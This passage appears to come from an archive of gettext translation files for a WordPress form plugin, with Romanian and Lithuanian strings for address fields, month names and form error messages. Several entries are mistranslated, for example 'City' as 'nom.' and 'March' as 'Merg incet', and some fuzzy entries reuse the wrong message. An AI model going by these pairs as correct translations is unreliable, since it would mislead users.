#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ro_RO.po000060400000040277152434416630012230 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2014-05-27 16:12+0300\n"
"PO-Revision-Date: 2014-05-27 16:13+0300\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ro\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.6.3\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpressraf\\wp-content\\plugins"
"\\form-maker\n"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:221
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2846
msgid "Street Address"
msgstr "Adresa"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:224
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2847
msgid "Street Address Line 2"
msgstr "Strada Linia Adresa 2"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:227
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2848
msgid "City"
msgstr "nom."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:230
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2849
msgid "State / Province / Region"
msgstr "Stat / Provincie / Regiune"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:233
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2850
msgid "Postal / Zip Code"
msgstr "Postal / Cod postal"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:236
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2851
msgid "Country"
msgstr "Ţara"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2834
msgid "January"
msgstr "Ianuarie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2835
msgid "February"
msgstr "Februarie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2836
msgid "March"
msgstr "Merg incet"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2837
msgid "April"
msgstr "Aprilie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2838
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2839
msgid "June"
msgstr "Iunie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2840
msgid "July"
msgstr "Iulie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2841
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2842
msgid "September"
msgstr "Septembrie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2843
msgid "October"
msgstr "Octombrie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2844
msgid "November"
msgstr "Noiembrie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:1864
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1357
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2845
msgid "December"
msgstr "Decembrie"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2275
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1788
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1828
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1882
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1919
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1973
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2014
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2857
msgid "Quantity"
msgstr "Cantitate"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:78
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "De eroare, cod de securitate incorect."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"IP-ul este pe lista neagră. Vă rugăm să contactați administratorul site-ului"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:252
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:770
msgid "The file exceeds the allowed size of"
msgstr "Fişierul depăşeşte dimensiunea permis de"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:271
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:785
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1459
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2878
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Ne pare rău, nu li se permite să încărcaţi acest tip de fişier."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:283
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:798
msgid "Error, file cannot be moved."
msgstr "Eroare, fişierul nu poate fi mutat."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:661
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1115
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Acest câmp %s necesită o intrare unică şi această valoare a fost deja "
"prezentat."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:803
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Eroare, e-mail nu a fost trimis."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1255
msgid "Nothing was submitted."
msgstr "Nimic nu a fost prezentat."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2619
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2632
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4325
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4330
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Formularul de dvs. a fost trimis cu succes."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2627
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4321
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Eroare, e-mail nu a fost trimis."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:232
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:279
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:329
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:376
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:425
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:480
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:552
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:657
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:672
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:774
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:846
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:947
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1033
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1106
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1165
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1241
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1288
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1396
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1444
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1667
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1813
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1906
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1998
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2070
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2171
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2230
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2285
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2345
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2402
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2462
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2576
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2590
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2605
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2620
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2883
msgid "field is required."
msgstr "câmp este necesar."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:863
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2881
msgid "This is not a valid email address."
msgstr "Aceasta nu este o adresă de e-mail validă."

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1706
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2884
msgid "The"
msgstr ""

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1706
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2884
msgid "value must be between"
msgstr "Valoarea trebuie să fie între "

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2476
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2669
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2670
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2879
#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2880
msgid "Your score should be less than"
msgstr "Scorul dvs. ar trebui să fie mai mică de"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2830
msgid "Title"
msgstr "Titlu"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2831
msgid "First"
msgstr "Prima"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2832
msgid "Last"
msgstr "Ultimul"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2833
msgid "Middle"
msgstr "MIJLOC"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2852
msgid "Area Code"
msgstr "Prefixul zonei"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2853
msgid "Phone Number"
msgstr "Numar de telefon"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2854
msgid "Dollars"
msgstr "De dolari"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2855
msgid "Cents"
msgstr "Cenți"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2858
msgid "From"
msgstr "De la"

#: C:\wamp\www\wordpressraf\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2859
msgid "To"
msgstr "Pentru a"
languages/form_maker-lt_LT.po000060400000057100152434416630012217 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:00+0400\n"
"PO-Revision-Date: 2015-05-22 17:00+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: lt\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Gatvė"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Gatvė Line 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Miestas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Valstija / provincija / regionas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Pašto kodas / indeksas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Šalis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Sausis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Vasaris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Kovas"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Balandis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Gegužės"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Birželis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Liepa"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Rugpjūtis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Rugsėjis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Spalis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Lapkritis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Gruodis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Klaida, neteisingą apsaugos kodą."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Jūsų ip yra juodajame sąraše. Prašome susisiekti su svetainės "
"administratoriumi"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Failas viršija leistiną dydį"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Atsiprašome, bet jums neleidžiama įkelti šį failo tipą."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Klaida, failas negali būti perkeltas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Šis laukelis %s reikalauja unikalų įrašą, o ši vertė jau buvo pateiktas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Klaida, laiškas nebuvo išsiųstas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nieko nebuvo pateikta."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Jūsų forma buvo sėkmingai pateikta."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Klaida, laiškas nebuvo išsiųstas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Jūsų elektroninio pašto adresas jau patikrintas."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Jūsų el.pašto buvo sėkmingai patikrinta."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Jūsų el.pašto patikrinimas laikas baigėsi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Patvirtinimo nuoroda yra neteisinga."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
